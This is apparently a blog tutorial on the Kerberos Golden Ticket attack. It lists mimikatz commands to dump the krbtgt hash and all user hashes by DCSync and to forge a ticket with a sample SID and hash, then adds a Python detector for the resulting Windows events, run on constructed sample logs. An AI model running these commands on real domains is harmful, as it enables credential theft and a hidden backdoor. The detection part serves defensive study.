Pass-the-ticket: the Golden Ticket

A Golden Ticket is a valid TGT (Ticket Granting Ticket) encrypted with the key of the Kerberos service account (krbtgt). Because the krbtgt key only exists on a domain controller, forging one means you have already obtained domain controller privileges and want to keep access after those privileges are lost. Domain controllers may change other passwords, but nobody usually touches the krbtgt account's password, so from another angle a Golden Ticket can be understood as a backdoor.

Prerequisites: the domain name, the domain SID, the domain's krbtgt hash (which implies you already have domain controller privileges), and a forged user name (an existing user or any user that does not exist).

Procedure:

lsadump::dcsync /domain:yangdc.com /user:krbtgt    (export the krbtgt hash)

lsadump::dcsync /domain:yangdc.com /all /csv    (list the hashes of all domain users)

whoami /all    (obtain the domain SID)

kerberos::golden /domain:yangdc.com /sid:S-1-5-21-3607266505-2347408569-3184741851 /rc4:61406f430331547ae23cf5aaf215d6a5 /user:yangtest /R-

klist shows the injected ticket; remote access with dir is as follows (screenshot not included):

Get cmdshell (screenshot not included)
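From the defender's side, the procedure above leaves two artefacts in Windows security logs: the DCSync replication request (event 4662 with the directory-replication control access rights) and service-ticket requests (event 4769) for a forged user, RC4-encrypted because the ticket was built from the /rc4 key. The following detector is an added example, not code from the original post; the event dictionaries, the account list and the user names are constructed sample data.

```python
# Added example: flag DCSync-style replication and Golden-Ticket-style TGS
# requests in parsed Windows security events. Sample events are constructed.
RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC (AES256 is 0x12)
DCSYNC_RIGHTS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
)

def detect(events, known_accounts, aes_only_domain=True):
    """Return (event_id, account, reason) tuples for suspicious events.

    known_accounts: lowercase sAMAccountNames that exist in AD (here a
    constructed set; in practice pulled from the directory).
    aes_only_domain: True when the domain is expected to issue only AES tickets,
    so an RC4 service ticket is itself an anomaly.
    """
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == "4769":
            user = ev["TargetUserName"].split("@")[0].lower()
            if user not in known_accounts:
                findings.append((eid, user, "TGS request for an account that does not exist in AD"))
            if aes_only_domain and ev.get("TicketEncryptionType") == RC4_HMAC:
                findings.append((eid, user, "RC4 service ticket in an AES-only domain"))
        elif eid == "4662" and ev.get("AccessMask") == "0x100":  # control access right
            subject = ev["SubjectUserName"]
            props = ev.get("Properties", "")
            # Domain controllers replicate with their machine accounts (trailing $);
            # a plain user account exercising replication rights is DCSync-like.
            if any(g in props for g in DCSYNC_RIGHTS) and not subject.endswith("$"):
                findings.append((eid, subject, "directory replication by a non-DC account"))
    return findings

SAMPLE_EVENTS = [  # constructed, not real log data
    {"EventID": "4769", "TargetUserName": "administrator@YANGDC.COM",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12"},
    {"EventID": "4769", "TargetUserName": "yangtest@YANGDC.COM",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x17"},
    {"EventID": "4662", "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": "4662", "SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]
KNOWN_ACCOUNTS = {"administrator", "jdoe", "dc01$", "dc02$"}

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(finding)
```

The forged-user check only works where the account truly does not exist; a Golden Ticket minted for a real account is caught by the encryption-type check or by correlating 4769 events that have no preceding 4768 (TGT request) for that account.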



Source: www.cnblogs.com/Yang34/p/12369297.html